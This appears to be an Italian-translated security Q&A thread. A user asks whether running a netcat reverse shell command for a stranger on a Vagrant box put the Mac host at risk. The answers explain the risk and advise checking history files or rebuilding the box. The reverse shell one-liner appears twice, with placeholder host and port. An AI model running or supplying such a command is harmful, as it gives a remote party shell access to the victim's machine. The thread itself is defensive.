come si comporta la shell inversa?

15

Qualcuno mi stava aiutando con un problema sul mio server vagabondo. È stato in grado di accedere alla shell tramite (l'ho eseguito per lui, con il suo IP e la sua porta):

nc <ip> -e /bin/bash <port>

Non l'ho mai incontrato prima, ma mi è sembrato molto interessante.

La mia macchina host è Mac. Potrebbe potenzialmente ottenere l'accesso al mio mac tramite ospite vagabondo?

Probabilmente dovrei distruggere e ricreare la scatola vagabonda giusto?

    
posta schroeder 11.02.2016 - 23:01
fonte

3 risposte

15

Suppongo che intendessi:

ncat -e /bin/bash <ip> <port>

L'argomento -e avvia il comando /bin/bash quando viene stabilita una connessione. Il comando si collega quindi all'IP ed esegue bash per l'interazione con l'utente remoto. L'utente remoto ottiene tutto ciò che ha l'utente di avvio. Una volta che questo comando è stato terminato, allora ha anche la connessione. Nessun problema per la connessione duratura lì.

MA la domanda reale è ciò che quella persona ha fatto sulla tua scatola vagabonda ... Potrebbe avere configurare o installare una backdoor, o qualcos'altro per avere una connessione persistente.

È possibile controllare il file di cronologia della sessione per vedere cosa ha fatto, o ricostruire la scatola se non è possibile verificare le sue azioni.

    
risposta data 12.02.2016 - 00:13
fonte
9

Netcat è uno strumento di rete di base per la lettura / scrittura di connessioni TCP / UDP. Nell'esempio che hai fornito, stai dicendo di eseguire il programma specificato da -e attraverso TCP alla macchina remota e al numero di porta. In quell'istanza particolare stavi inviando una shell bash alla sua macchina, presumibilmente dove aveva un ascoltatore netcat in attesa.

Netcat è davvero il coltellino svizzero di networking. Puoi fare così tanto con esso. Puoi:

  • crea proxy
  • Chat
  • acquista i banner di servizio
  • port scan
  • reverse shell
  • associa shell
  • usalo come un semplice web server
  • trasferire file su Internet

È uno strumento estremamente potente.

Per rispondere alla tua domanda sull'opportunità o meno di poterlo usare per accedere al tuo mac: non è di per sé. Dovevi avviare il guscio inverso nella sua scatola. Senza che tu invii la shell, non potrebbe mai connettersi. Tuttavia, dopo la connessione sarebbe stato in grado di piantare una backdoor per l'accesso permanente.

Un attaccante con qualsiasi abilità avrebbe ripulito i suoi registri di sessione (e di sistema), quindi non puoi nemmeno fidarti di quelli per dire la verità su quello che è successo. L'UNICA cosa veramente sicura che puoi fare è pulire la scatola.

    
risposta data 12.02.2016 - 01:08
fonte
2

È stata segnalata una vulnerabilità in cui un utente malintenzionato potrebbe uscire da Guest virtuale tramite accelerazione 3D e accesso al sistema operativo host.

Ciò richiede che l'accelerazione 3D sia abilitata per il SO guest.

    
risposta data 12.02.2016 - 09:09
fonte

Leggi altre domande sui tag